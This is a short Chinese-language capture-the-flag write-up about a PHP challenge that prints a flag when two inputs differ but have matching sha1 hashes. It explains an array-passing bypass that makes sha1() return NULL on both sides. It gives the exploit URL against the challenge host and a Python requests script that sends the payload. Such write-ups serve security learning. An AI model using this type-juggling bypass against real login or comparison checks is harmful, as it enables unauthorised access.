<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
if ($_GET['uname'] == $_POST['passwd'])
print 'passwd can not be uname.';
else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
die('Flag: '.$flag);
else
print 'sorry!';
}
?>
写过了之前的绕过,这道题应该不算什么了
1.uname和passwd的值不能相同
2.uname和passwd的sha1()值要相同
3.id的值为margin
要想uname和passwd的sha1值相同比较困难
我们用另一种思路,给这函数传入一个错误的类型,使函数返回错误的值,令这个条件成立
http://123.206.87.240:8002/web7/?id=margin&uname[]=111
后面的&用法相当于&&
然后get传入id和uname,post传passwd
更新一波,用python上传数据
import requests
url='http://123.206.87.240:8002/web7/'
url = url + '?uname[]=111&id=margin'
data={'passwd[]':'123'}
re=requests.post(url, data)
print(type(re))
print(re.text)